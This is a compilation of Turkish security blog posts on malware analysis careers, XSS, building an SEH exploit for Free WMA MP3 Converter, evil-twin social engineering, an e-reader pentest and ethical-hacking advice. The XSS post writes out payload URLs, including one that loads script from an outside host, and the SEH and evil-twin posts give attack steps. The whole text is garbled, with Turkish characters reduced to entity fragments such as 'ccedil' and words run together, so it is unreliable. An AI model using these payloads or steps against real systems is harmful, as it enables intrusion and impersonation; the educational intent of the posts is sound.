Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk 